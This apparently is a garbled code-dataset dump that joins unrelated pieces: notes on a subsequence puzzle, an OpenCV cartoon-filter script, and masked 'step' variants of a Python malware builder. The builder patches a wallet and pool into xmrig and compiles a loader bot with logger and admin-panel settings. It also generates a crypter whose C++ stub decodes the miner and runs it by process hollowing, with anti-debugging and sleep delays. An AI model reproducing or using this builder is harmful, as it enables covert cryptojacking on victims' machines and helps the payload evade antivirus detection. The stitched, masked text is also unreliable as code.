"step-5": "'''\nGiven []int, most mostCompetitive subsequence is\na sublist of nums.\n\nSo we calculate a score, score is ∀ x ∈ nums, score += x_n - x_n-1\n\nYou can remove as many elements are you need to.\n\nWhat is the mostCompetitive subsequence that you can come up with?\n\n[1,3,5]\n[1,3,4] ← More competitive\n\n[1,2,5] ← More competitive\n[1,3,4]\n\nThis is true b/c we evaluate on the first point where the two differ.\n\n1) We care about creating lists that contain as small of numbers as\npossible. The numbers don't need to be in order, they just need to be\nsmall.\n\nWe care about all numbers, s.t. we can create a subsequence of k or more\nbehind them.\n\nGet all possible sub-sequences, with length k or more. If more than k,\niterate through how we can remove the largest elements.\n\nWe should also keep track of the smallest number that corresponds to a valid\nsequence?\n\nI'm leaning towards a brute force method.\n\n1) Find all sequences of length k. Store the most competitive.\n\n\nSo we should write a function that compares two sequences to see which is more\ncompetitive.\n\nDo one run, with subsequence == k.\nThen try to beat that run.\n\nKeep track of what the 'winning' subsequence is, and\niterate through possible values.\n\nSo two iterations.\n\n[2,4,3,3,5,4,9,6] | k = 4\n ( )\n\nans = 2,4,3,3\n\n\n\n[2,4,3,3,5,4,9,6] | k = 4\n( )\n\n2,4,3,3\n ^\n\nidx = 0\n\nOnce we have 'beaten' it, out of the remaining\nelements, remove the max element until length of\nsublist is workable.\n\n\n[2, 3, 3, ]\n\n1) Write isMoreCompetitive\n2) First pass → get most competitive with sliding window len = k\n3) Second + pass. If we make a change/'win', re-run again. If re-run and\n no change, we are done.\n\n'''\n\n'''\nTo Review:\n\ndef mostCompetitive(self, nums, k):\n to_remove = len(nums) - k\n stack = []\n\n for x in nums:\n while stack and x < stack[-1] and to_remove:\n to_remove -= 1\n stack.pop()\n stack.append(x)\n\n for _ in range(to_remove):\n stack.pop()\n\n return stack\n'''\n\n\n\nclass Solution:\n\n # is a more competitive than b?\n def isMoreCompetitive(self, a, b):\n if len(a) != len(b):\n print(\"Error, len()'s do not match'\")\n return \"Error\"\n\n for i in range(len(a)):\n if a[i] == b[i]:\n continue\n elif a[i] < b[i]:\n return True\n else:\n return False\n\n return False\n\n def refined(self, nums, i, a, ans):\n if i >= len(nums):\n if len(a) == len(ans) and self.isMoreCompetitive(a, ans) == False:\n return False, None\n\n elif len(a) != len(ans):\n return False, None\n\n else:\n return True, a\n\n elif i < len(nums) and len(ans)-len(a) <= len(nums)-i :\n boolA, respA = self.refined(nums, i+1, a+[nums[i]], ans)\n boolB, respB = self.refined(nums, i+1, a, ans)\n\n if boolA == True and boolB == True:\n if self.isMoreCompetitive(respA, respB):\n return True, respA\n else:\n return True, respB\n\n elif boolA == True:\n return boolA, respA\n\n elif boolB == True:\n return True, respB\n\n else:\n return False, None\n\n else:\n return False, None\n\n\n\n def mostCompetitive(self, nums, k):\n\n if len(nums) < k :\n print(\"length mismatch @ init\")\n return False\n\n ans = list(nums[0:k])\n tmp = list(nums[0:k])\n i = k\n\n # Initial pass\n while i < len(nums):\n # print(tmp)\n del tmp[0]\n # print(tmp)\n tmp.append(nums[i])\n # print(tmp)\n if self.isMoreCompetitive(tmp, ans):\n ans = list(tmp)\n i += 1\n # print(\"ans: {}, tmp:{}\".format(ans, tmp))\n # print(\"\")\n\n # Pass 2\n shouldContinue = True\n idx = 0\n\n foundAnswer, updateAns = self.refined(nums, 0, [], ans)\n\n if 
foundAnswer == True:\n return updateAns\n\n return ans\n\n\n\n\nif __name__ == '__main__':\n s = Solution()\n\n print(s.mostCompetitive([3,5,2,6], 2))\n print(s.mostCompetitive([2,4,3,3,5,4,9,6], 4))\n print(s.mostCompetitive([84,10,71,23,66,61,62,64,34,41,80,25,91,43,4,75,65,13,37,41,46,90,55,8,85,61,95,71], 24))\n print(s.mostCompetitive([2,4,3,3,5,4,9,6], 4))\n\n\n [11,52,57,91,47,95,86,46,87,47,70,56,54,61,89,44,3,73,1,7,87,48,17,25,49,54,6,72,97,62,16,11,47,34,68,58,14,36,46,65,2,15]\n18\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 3 18:45:08 2020
@author: Neeraj
"""
import cv2
import numpy as np
num_down = 2        # number of pyrDown/pyrUp steps
num_bilateral = 50  # number of bilateral filtering passes

img_rgb = cv2.imread("stunning-latest-pics-of-Kajal-Agarwal.jpg")  # image path
if img_rgb is None:
    raise SystemExit("Could not read the input image")
img_rgb = cv2.resize(img_rgb, (800, 800))

img_color = img_rgb

# downsample first: the repeated bilateral filter is expensive
for _ in range(num_down):
    img_color = cv2.pyrDown(img_color)

# repeated small bilateral filters flatten colors while keeping edges sharp
for _ in range(num_bilateral):
    img_color = cv2.bilateralFilter(img_color, d=9,
                                    sigmaColor=9,
                                    sigmaSpace=7)

# upsample back to the original 800x800 size
for _ in range(num_down):
    img_color = cv2.pyrUp(img_color)

# cv2.imread returns BGR, so BGR2GRAY is the appropriate conversion
img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
img_blur = cv2.medianBlur(img_gray, 7)

# adaptive threshold keeps a pixel white unless it is darker than its
# 9x9 neighbourhood mean minus C, tracing the edges in black
img_edge = cv2.adaptiveThreshold(img_blur, 255,
                                 cv2.ADAPTIVE_THRESH_MEAN_C,
                                 cv2.THRESH_BINARY,
                                 blockSize=9,
                                 C=2)
img_edge = cv2.cvtColor(img_edge, cv2.COLOR_GRAY2RGB)  # back to 3 channels
img_sketch = cv2.bitwise_and(img_color, img_edge)

# displaying the actual and sketched images
stack = np.hstack([img_rgb, img_sketch])
# cv2.imshow("stacked", stack)
# cv2.waitKey(0)

cv2.imwrite("cartoon1.jpg", stack)  # to save the image
|
normal
|
{
"blob_id": "16db443642746af4ae45862627baaa9eca54a165",
"index": 3138,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor _ in range(num_down):\n img_color = cv2.pyrDown(img_color)\nfor _ in range(num_bilateral):\n img_color = cv2.bilateralFilter(img_color, d=9, sigmaColor=9, sigmaSpace=7)\nfor _ in range(num_down):\n img_color = cv2.pyrUp(img_color)\n<mask token>\ncv2.imwrite('cartoon1.jpg', stack)\n",
"step-3": "<mask token>\nnum_down = 2\nnum_bilateral = 50\nimg_rgb = cv2.imread('stunning-latest-pics-of-Kajal-Agarwal.jpg')\nimg_rgb = cv2.resize(img_rgb, (800, 800))\nimg_color = img_rgb\nfor _ in range(num_down):\n img_color = cv2.pyrDown(img_color)\nfor _ in range(num_bilateral):\n img_color = cv2.bilateralFilter(img_color, d=9, sigmaColor=9, sigmaSpace=7)\nfor _ in range(num_down):\n img_color = cv2.pyrUp(img_color)\nimg_gray = cv2.cvtColor(img_rgb, cv2.COLOR_RGB2GRAY)\nimg_blur = cv2.medianBlur(img_gray, 7)\nimg_edge = cv2.adaptiveThreshold(img_blur, 255, cv2.ADAPTIVE_THRESH_MEAN_C,\n cv2.THRESH_BINARY, blockSize=9, C=2)\nimg_edge = cv2.cvtColor(img_edge, cv2.COLOR_GRAY2RGB)\nimg_sketch = cv2.bitwise_and(img_color, img_edge)\nstack = np.hstack([img_rgb, img_sketch])\ncv2.imwrite('cartoon1.jpg', stack)\n",
"step-4": "<mask token>\nimport cv2\nimport numpy as np\nnum_down = 2\nnum_bilateral = 50\nimg_rgb = cv2.imread('stunning-latest-pics-of-Kajal-Agarwal.jpg')\nimg_rgb = cv2.resize(img_rgb, (800, 800))\nimg_color = img_rgb\nfor _ in range(num_down):\n img_color = cv2.pyrDown(img_color)\nfor _ in range(num_bilateral):\n img_color = cv2.bilateralFilter(img_color, d=9, sigmaColor=9, sigmaSpace=7)\nfor _ in range(num_down):\n img_color = cv2.pyrUp(img_color)\nimg_gray = cv2.cvtColor(img_rgb, cv2.COLOR_RGB2GRAY)\nimg_blur = cv2.medianBlur(img_gray, 7)\nimg_edge = cv2.adaptiveThreshold(img_blur, 255, cv2.ADAPTIVE_THRESH_MEAN_C,\n cv2.THRESH_BINARY, blockSize=9, C=2)\nimg_edge = cv2.cvtColor(img_edge, cv2.COLOR_GRAY2RGB)\nimg_sketch = cv2.bitwise_and(img_color, img_edge)\nstack = np.hstack([img_rgb, img_sketch])\ncv2.imwrite('cartoon1.jpg', stack)\n",
"step-5": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 3 18:45:08 2020\r\n\r\n@author: Neeraj\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\nnum_down=2\r\nnum_bilateral=50\r\n\r\nimg_rgb=cv2.imread(\"stunning-latest-pics-of-Kajal-Agarwal.jpg\") #image path\r\nimg_rgb=cv2.resize(img_rgb,(800,800))\r\n\r\nimg_color=img_rgb\r\n\r\nfor _ in range(num_down):\r\n img_color=cv2.pyrDown(img_color)\r\n \r\nfor _ in range(num_bilateral):\r\n img_color=cv2.bilateralFilter(img_color,d=9,\r\n sigmaColor=9,\r\n sigmaSpace=7)\r\n\r\n\r\nfor _ in range(num_down):\r\n img_color=cv2.pyrUp(img_color)\r\n \r\nimg_gray=cv2.cvtColor(img_rgb,cv2.COLOR_RGB2GRAY)\r\nimg_blur=cv2.medianBlur(img_gray,7)\r\n\r\nimg_edge=cv2.adaptiveThreshold(img_blur,255,\r\n cv2.ADAPTIVE_THRESH_MEAN_C,\r\n cv2.THRESH_BINARY,\r\n blockSize=9,\r\n C=2)\r\nimg_edge=cv2.cvtColor(img_edge,cv2.COLOR_GRAY2RGB)\r\nimg_sketch=cv2.bitwise_and(img_color,img_edge)\r\n\r\n#displaying the actual and sketched images\r\n\r\nstack=np.hstack([img_rgb,img_sketch])\r\n# cv2.imshow(\"stacked\",stack)\r\n# cv2.waitKey(0)\r\n\r\ncv2.imwrite(\"cartoon1.jpg\",stack) #to save the image\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def load_userdata(wallet, pool, ww, logger, adminka):
with open('D:\\msys64\\xmrig-master\\src\\ex.cpp', 'r') as f:
file = f.read()
file = file.replace('%u%', wallet)
file = file.replace('%p%', pool)
file = file.replace('%w%', ww)
with open('D:\\msys64\\xmrig-master\\src\\xmrig.cpp', 'w') as w:
w.write(file)
with open(os.getcwd() + '\\Bot\\Miner\\ex.cs', 'r') as f:
file = f.read()
file = file.replace('%l%', logger)
file = file.replace('%a%', adminka)
with open(os.getcwd() + '\\Bot\\Miner\\Program.cs', 'w') as w:
w.write(file)
def writeBytes(key):
with open(os.getcwd() + '\\file.txt', 'r') as f:
file = f.read()
with open(os.getcwd() + '\\Miner\\CryptRunPe\\winhost.cpp', 'w') as w:
w.write(
"""#include <stdafx.h>
#include "process.h"
#include "memrun.h"
using namespace std;
"""
)
with open('ex.txt') as ex:
w.write(file)
exx = ex.read()
w.write(exx)
def compile(path, file):
os.system(
'%windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe "' +
path + file + '.sln" /p:Configuration=Release')
def compileM(path, file):
os.system('msbuild.exe "' + path + file + '.sln" /p:Configuration=Release')
def compileR(path, file):
os.system('msbuild.exe "' + path + file +
'.sln" /p:Configuration=Release /p:Platform="WIN32"')
def xcopy(path, out):
try:
with open(path, 'rb') as f:
file = f.read()
with open(out, 'wb') as w:
w.write(bytearray(file))
except:
pass
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def load_userdata(wallet, pool, ww, logger, adminka):
with open('D:\\msys64\\xmrig-master\\src\\ex.cpp', 'r') as f:
file = f.read()
file = file.replace('%u%', wallet)
file = file.replace('%p%', pool)
file = file.replace('%w%', ww)
with open('D:\\msys64\\xmrig-master\\src\\xmrig.cpp', 'w') as w:
w.write(file)
with open(os.getcwd() + '\\Bot\\Miner\\ex.cs', 'r') as f:
file = f.read()
file = file.replace('%l%', logger)
file = file.replace('%a%', adminka)
with open(os.getcwd() + '\\Bot\\Miner\\Program.cs', 'w') as w:
w.write(file)
def writeBytes(key):
with open(os.getcwd() + '\\file.txt', 'r') as f:
file = f.read()
with open(os.getcwd() + '\\Miner\\CryptRunPe\\winhost.cpp', 'w') as w:
w.write(
"""#include <stdafx.h>
#include "process.h"
#include "memrun.h"
using namespace std;
"""
)
with open('ex.txt') as ex:
w.write(file)
exx = ex.read()
w.write(exx)
def compile(path, file):
os.system(
'%windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe "' +
path + file + '.sln" /p:Configuration=Release')
def compileM(path, file):
os.system('msbuild.exe "' + path + file + '.sln" /p:Configuration=Release')
def compileR(path, file):
os.system('msbuild.exe "' + path + file +
'.sln" /p:Configuration=Release /p:Platform="WIN32"')
def xcopy(path, out):
try:
with open(path, 'rb') as f:
file = f.read()
with open(out, 'wb') as w:
w.write(bytearray(file))
except:
pass
def crypt(name, key):
with open('encoder.cpp', 'w') as w:
txt = """
#include <Windows.h>
#include <winternl.h>
#include <iostream>
#include <string>
#include <fstream>
using namespace std;
int main()
{
FILE * file = fopen("in.exe", "rb");
if (file == NULL) return 0;
fseek(file, 0, SEEK_END);
long int size = ftell(file);
fclose(file);
file = fopen("in.exe", "rb");
unsigned char * in = (unsigned char *)malloc(size);
int bytes_read = fread(in, sizeof(unsigned char), size, file);
fclose(file);
for (int i = 0; i < size; i++) {
in[i] = in[i] - 0x0%n%;
}
file = fopen("out.exe", "wb");
int bytes_written = fwrite(in, sizeof(unsigned char), size, file);
fclose(file);
for (int i = 0; i < size; i++) {
in[i] = in[i] + 0x0%n%;
}
file = fopen("decr.exe", "wb");
bytes_written = fwrite(in, sizeof(unsigned char), size, file);
fclose(file);
return 0;
}
"""
txt = txt.replace('%n%', str(key))
w.write(txt)
os.system('g++ -o enc encoder.cpp')
os.system('C:\\Python27\\python.exe cv.py')
with open('file.txt', 'r') as r:
with open(os.getcwd() + '\\src\\crypter\\crypter.cpp', 'w') as w:
txt = """ #include "stdafx.h"
#include "Crypter.h"
#include <windows.h>
#include <winternl.h>
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"ntdll.lib")
""" + r.read() + """ int RunPortableExecutable(void* Image) {
IMAGE_DOS_HEADER* DOSHeader;
IMAGE_NT_HEADERS* NtHeader;
IMAGE_SECTION_HEADER* SectionHeader;
PROCESS_INFORMATION PI;
STARTUPINFOA SI;
CONTEXT* CTX;
DWORD* ImageBase;
void* pImageBase;
int count;
char buffer[MAX_PATH];
GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);
char *CurrentFilePath = buffer;
DOSHeader = PIMAGE_DOS_HEADER(Image);
NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);
if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {
ZeroMemory(&PI, sizeof(PI));
ZeroMemory(&SI, sizeof(SI));
typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
NtUnmapViewOfSection mNtUnmapViewOfSection;
if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {
CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
CTX->ContextFlags = CONTEXT_FULL;
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {
ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);
pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {
SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));
WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),
LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
}
WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);
CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread, LPCONTEXT(CTX));
ResumeThread(PI.hThread);
return 0;
}
}
}
}
int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {
for (int i = 0; i < 550000; i++)
OutputDebugStringW(L"");
for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {
unsigned char b = rawData[i] + 0x0%n%;
rawData[i] = b;
}
Sleep(((rand() % 5 + 1) + 5) * 1000);
RunPortableExecutable(rawData);
return 0;
} """
txt = txt.replace('%n%', str(key))
w.write(txt)
compileM(os.getcwd() + '\\src\\', 'ConsoleApplication1')
xcopy(os.getcwd() + '\\src\\Release\\Crypter.exe', os.getcwd() +
'\\' + name + '.exe')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def load_userdata(wallet, pool, ww, logger, adminka):
with open('D:\\msys64\\xmrig-master\\src\\ex.cpp', 'r') as f:
file = f.read()
file = file.replace('%u%', wallet)
file = file.replace('%p%', pool)
file = file.replace('%w%', ww)
with open('D:\\msys64\\xmrig-master\\src\\xmrig.cpp', 'w') as w:
w.write(file)
with open(os.getcwd() + '\\Bot\\Miner\\ex.cs', 'r') as f:
file = f.read()
file = file.replace('%l%', logger)
file = file.replace('%a%', adminka)
with open(os.getcwd() + '\\Bot\\Miner\\Program.cs', 'w') as w:
w.write(file)
def writeBytes(key):
with open(os.getcwd() + '\\file.txt', 'r') as f:
file = f.read()
with open(os.getcwd() + '\\Miner\\CryptRunPe\\winhost.cpp', 'w') as w:
w.write(
"""#include <stdafx.h>
#include "process.h"
#include "memrun.h"
using namespace std;
"""
)
with open('ex.txt') as ex:
w.write(file)
exx = ex.read()
w.write(exx)
def compile(path, file):
os.system(
'%windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe "' +
path + file + '.sln" /p:Configuration=Release')
def compileM(path, file):
os.system('msbuild.exe "' + path + file + '.sln" /p:Configuration=Release')
def compileR(path, file):
os.system('msbuild.exe "' + path + file +
'.sln" /p:Configuration=Release /p:Platform="WIN32"')
def xcopy(path, out):
try:
with open(path, 'rb') as f:
file = f.read()
with open(out, 'wb') as w:
w.write(bytearray(file))
except:
pass
def crypt(name, key):
with open('encoder.cpp', 'w') as w:
txt = """
#include <Windows.h>
#include <winternl.h>
#include <iostream>
#include <string>
#include <fstream>
using namespace std;
int main()
{
FILE * file = fopen("in.exe", "rb");
if (file == NULL) return 0;
fseek(file, 0, SEEK_END);
long int size = ftell(file);
fclose(file);
file = fopen("in.exe", "rb");
unsigned char * in = (unsigned char *)malloc(size);
int bytes_read = fread(in, sizeof(unsigned char), size, file);
fclose(file);
for (int i = 0; i < size; i++) {
in[i] = in[i] - 0x0%n%;
}
file = fopen("out.exe", "wb");
int bytes_written = fwrite(in, sizeof(unsigned char), size, file);
fclose(file);
for (int i = 0; i < size; i++) {
in[i] = in[i] + 0x0%n%;
}
file = fopen("decr.exe", "wb");
bytes_written = fwrite(in, sizeof(unsigned char), size, file);
fclose(file);
return 0;
}
"""
txt = txt.replace('%n%', str(key))
w.write(txt)
os.system('g++ -o enc encoder.cpp')
os.system('C:\\Python27\\python.exe cv.py')
with open('file.txt', 'r') as r:
with open(os.getcwd() + '\\src\\crypter\\crypter.cpp', 'w') as w:
txt = """ #include "stdafx.h"
#include "Crypter.h"
#include <windows.h>
#include <winternl.h>
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"ntdll.lib")
""" + r.read() + """ int RunPortableExecutable(void* Image) {
IMAGE_DOS_HEADER* DOSHeader;
IMAGE_NT_HEADERS* NtHeader;
IMAGE_SECTION_HEADER* SectionHeader;
PROCESS_INFORMATION PI;
STARTUPINFOA SI;
CONTEXT* CTX;
DWORD* ImageBase;
void* pImageBase;
int count;
char buffer[MAX_PATH];
GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);
char *CurrentFilePath = buffer;
DOSHeader = PIMAGE_DOS_HEADER(Image);
NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);
if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {
ZeroMemory(&PI, sizeof(PI));
ZeroMemory(&SI, sizeof(SI));
typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
NtUnmapViewOfSection mNtUnmapViewOfSection;
if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {
CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
CTX->ContextFlags = CONTEXT_FULL;
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {
ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);
pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {
SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));
WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),
LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
}
WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);
CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread, LPCONTEXT(CTX));
ResumeThread(PI.hThread);
return 0;
}
}
}
}
int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {
for (int i = 0; i < 550000; i++)
OutputDebugStringW(L"");
for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {
unsigned char b = rawData[i] + 0x0%n%;
rawData[i] = b;
}
Sleep(((rand() % 5 + 1) + 5) * 1000);
RunPortableExecutable(rawData);
return 0;
} """
txt = txt.replace('%n%', str(key))
w.write(txt)
compileM(os.getcwd() + '\\src\\', 'ConsoleApplication1')
xcopy(os.getcwd() + '\\src\\Release\\Crypter.exe', os.getcwd() +
'\\' + name + '.exe')
<|reserved_special_token_0|>
load_userdata(u, p, w, l, a)
compile(os.getcwd() + '\\Bot\\', 'LoaderBot')
xcopy(os.getcwd() + '\\Bot\\Miner\\bin\\Release\\LoaderBot.exe', 'Bot.exe')
compileR(os.getcwd() + '\\rig\\', 'xmrig')
xcopy(os.getcwd() + '\\rig\\Release\\xmrig.exe', 'out.exe')
crypt('test', key)
os.system('C:\\Python27\\python.exe cv.py')
writeBytes(key)
compileM(os.getcwd() + '\\Miner\\', 'winhost')
xcopy(os.getcwd() + '\\Miner\\Release\\winhost.exe', 'in.exe')
print(os.getcwd() + '\\enc.exe')
subprocess.call(os.getcwd() + '\\enc.exe')
crypt('winhost', key)
os.system('del file.txt')
os.system('del in.exe')
os.system('del out.exe')
os.system('del decr.exe')
os.system('del enc.exe')
os.system('del test.exe')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def load_userdata(wallet, pool, ww, logger, adminka):
with open('D:\\msys64\\xmrig-master\\src\\ex.cpp', 'r') as f:
file = f.read()
file = file.replace('%u%', wallet)
file = file.replace('%p%', pool)
file = file.replace('%w%', ww)
with open('D:\\msys64\\xmrig-master\\src\\xmrig.cpp', 'w') as w:
w.write(file)
with open(os.getcwd() + '\\Bot\\Miner\\ex.cs', 'r') as f:
file = f.read()
file = file.replace('%l%', logger)
file = file.replace('%a%', adminka)
with open(os.getcwd() + '\\Bot\\Miner\\Program.cs', 'w') as w:
w.write(file)
def writeBytes(key):
with open(os.getcwd() + '\\file.txt', 'r') as f:
file = f.read()
with open(os.getcwd() + '\\Miner\\CryptRunPe\\winhost.cpp', 'w') as w:
w.write(
"""#include <stdafx.h>
#include "process.h"
#include "memrun.h"
using namespace std;
"""
)
with open('ex.txt') as ex:
w.write(file)
exx = ex.read()
w.write(exx)
def compile(path, file):
os.system(
'%windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe "' +
path + file + '.sln" /p:Configuration=Release')
def compileM(path, file):
os.system('msbuild.exe "' + path + file + '.sln" /p:Configuration=Release')
def compileR(path, file):
os.system('msbuild.exe "' + path + file +
'.sln" /p:Configuration=Release /p:Platform="WIN32"')
def xcopy(path, out):
try:
with open(path, 'rb') as f:
file = f.read()
with open(out, 'wb') as w:
w.write(bytearray(file))
except:
pass
def crypt(name, key):
with open('encoder.cpp', 'w') as w:
txt = """
#include <Windows.h>
#include <winternl.h>
#include <iostream>
#include <string>
#include <fstream>
using namespace std;
int main()
{
FILE * file = fopen("in.exe", "rb");
if (file == NULL) return 0;
fseek(file, 0, SEEK_END);
long int size = ftell(file);
fclose(file);
file = fopen("in.exe", "rb");
unsigned char * in = (unsigned char *)malloc(size);
int bytes_read = fread(in, sizeof(unsigned char), size, file);
fclose(file);
for (int i = 0; i < size; i++) {
in[i] = in[i] - 0x0%n%;
}
file = fopen("out.exe", "wb");
int bytes_written = fwrite(in, sizeof(unsigned char), size, file);
fclose(file);
for (int i = 0; i < size; i++) {
in[i] = in[i] + 0x0%n%;
}
file = fopen("decr.exe", "wb");
bytes_written = fwrite(in, sizeof(unsigned char), size, file);
fclose(file);
return 0;
}
"""
txt = txt.replace('%n%', str(key))
w.write(txt)
os.system('g++ -o enc encoder.cpp')
os.system('C:\\Python27\\python.exe cv.py')
with open('file.txt', 'r') as r:
with open(os.getcwd() + '\\src\\crypter\\crypter.cpp', 'w') as w:
txt = """ #include "stdafx.h"
#include "Crypter.h"
#include <windows.h>
#include <winternl.h>
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"ntdll.lib")
""" + r.read() + """ int RunPortableExecutable(void* Image) {
IMAGE_DOS_HEADER* DOSHeader;
IMAGE_NT_HEADERS* NtHeader;
IMAGE_SECTION_HEADER* SectionHeader;
PROCESS_INFORMATION PI;
STARTUPINFOA SI;
CONTEXT* CTX;
DWORD* ImageBase;
void* pImageBase;
int count;
char buffer[MAX_PATH];
GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);
char *CurrentFilePath = buffer;
DOSHeader = PIMAGE_DOS_HEADER(Image);
NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);
if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {
ZeroMemory(&PI, sizeof(PI));
ZeroMemory(&SI, sizeof(SI));
typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
NtUnmapViewOfSection mNtUnmapViewOfSection;
if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {
CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
CTX->ContextFlags = CONTEXT_FULL;
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {
ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);
pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {
SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));
WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),
LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
}
WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);
CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread, LPCONTEXT(CTX));
ResumeThread(PI.hThread);
return 0;
}
}
}
}
int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {
for (int i = 0; i < 550000; i++)
OutputDebugStringW(L"");
for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {
unsigned char b = rawData[i] + 0x0%n%;
rawData[i] = b;
}
Sleep(((rand() % 5 + 1) + 5) * 1000);
RunPortableExecutable(rawData);
return 0;
} """
txt = txt.replace('%n%', str(key))
w.write(txt)
compileM(os.getcwd() + '\\src\\', 'ConsoleApplication1')
xcopy(os.getcwd() + '\\src\\Release\\Crypter.exe', os.getcwd() +
'\\' + name + '.exe')
key = random.randint(1, 100)
u = sys.argv[1]
w = sys.argv[2]
p = sys.argv[3]
l = sys.argv[4]
a = sys.argv[5]
load_userdata(u, p, w, l, a)
